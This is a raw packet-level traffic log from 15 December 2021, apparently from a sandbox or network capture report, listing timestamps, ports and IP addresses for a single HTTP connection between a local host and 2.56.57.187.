Dec 15, 2021 14:47:52.380477905 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380486965 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380489111 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380495071 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380506992 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380513906 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380522013 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380523920 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380539894 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380539894 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380551100 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380558014 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380573988 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380582094 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380590916 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380606890 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.380634069 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380645990 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380655050 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.380661964 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.381146908 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.382134914 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.382220984 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.404664040 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.404705048 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.404735088 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.404757977 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.404761076 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.404787064 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.404788971 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.404792070 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.404795885 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.404828072 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.407957077 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.407996893 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408025026 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408046961 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408062935 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408067942 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408078909 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408092976 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408107996 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408121109 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408147097 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408174038 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408200979 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408227921 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408227921 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408255100 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408268929 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408272982 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408276081 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408282042 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408293962 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408298016 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408301115 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408310890 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408324957 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408339977 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408355951 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408368111 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408396006 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408397913 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408422947 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408448935 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408469915 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408479929 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408504009 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408508062 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408514023 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408520937 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408529043 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408535957 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408564091 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408586979 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408590078 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408600092 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408618927 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408622026 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408636093 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408646107 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408673048 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408689976 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408699989 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408701897 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408730030 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408739090 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408750057 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408759117 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408786058 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408787012 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408803940 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408813000 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408828974 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408839941 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408868074 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408885002 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408890963 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408917904 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408943892 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408945084 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408962011 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.408973932 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.408993959 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.409001112 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.409014940 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.409030914 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.409051895 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.409060955 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.409080029 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.409086943 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.409110069 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.409116030 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.409133911 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.409142971 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.409161091 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.409171104 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.409194946 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.409198046 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.409216881 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.409240961 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.430378914 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.430438995 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.430461884 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.430480957 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.430490971 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.430520058 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.430521965 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.430560112 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.430561066 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.430600882 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.430600882 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.430645943 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.435446978 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.435503960 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.435544014 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.435556889 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.435583115 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.435591936 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.435595989 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.435622931 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.435636044 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.435664892 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.435668945 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.435703993 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.435717106 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.435748100 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.435770988 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.435787916 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.435791016 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.435827017 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.435833931 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.435867071 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.435872078 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.435906887 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.435928106 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.435945988 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.435947895 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.435991049 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436007977 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436028957 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436039925 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436070919 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436083078 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436110973 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436119080 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436147928 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436158895 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436187983 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436191082 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436228037 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436229944 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436268091 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436270952 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436309099 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436311960 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436346054 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436352015 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436384916 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436388969 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436424017 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436428070 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436460972 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436467886 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436501026 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436506033 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436538935 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436542988 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436578035 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436583042 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436619043 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436620951 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436655998 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436661959 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436695099 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436698914 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436727047 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436737061 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436743975 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436774015 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436779022 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436813116 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436816931 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436868906 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436876059 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436918974 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.436924934 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436964035 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.436964989 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.437006950 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.437010050 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.437051058 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.437073946 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.437087059 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.437091112 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.437129974 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.437133074 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.437166929 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.437170029 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.437206030 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.437206984 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.437244892 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.437247992 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.437283993 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.437285900 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.437324047 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.437324047 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.437361956 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.437366962 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.437401056 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.439964056 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.440923929 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.455985069 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.456041098 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.456057072 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.456084967 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.456089973 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.456121922 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.456125021 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.456161022 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.456163883 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.456197977 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.456202984 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.456237078 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.462788105 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.462843895 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.462882042 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.462888956 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.462915897 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.462920904 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.462924004 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.462963104 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.462965965 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463004112 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463004112 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463042021 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463047028 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463083982 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463088036 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463124037 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463129044 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463165045 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463171005 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463206053 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463208914 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463243008 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463248014 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463282108 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463289976 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463327885 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463327885 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463363886 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463367939 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463401079 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463407040 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463440895 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463445902 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463481903 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463486910 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463522911 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463524103 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463565111 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463588953 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463597059 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463603973 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463637114 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463643074 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463677883 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463681936 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463720083 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463721037 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463757992 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463763952 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463799953 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463804960 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463840961 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463844061 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463882923 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463884115 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463918924 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463924885 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463958979 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.463965893 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.463999987 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464005947 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464041948 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464046955 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464080095 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464085102 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464119911 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464126110 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464159012 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464163065 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464196920 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464201927 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464237928 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464241028 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464273930 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464277983 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464312077 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464317083 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464353085 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464353085 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464395046 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464411974 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464422941 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464433908 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464468956 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464469910 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464505911 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464509964 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464545965 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464548111 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464582920 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464586020 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464622021 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464626074 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464660883 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464664936 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464699984 CET	49165	80	192.168.2.22	2.56.57.187
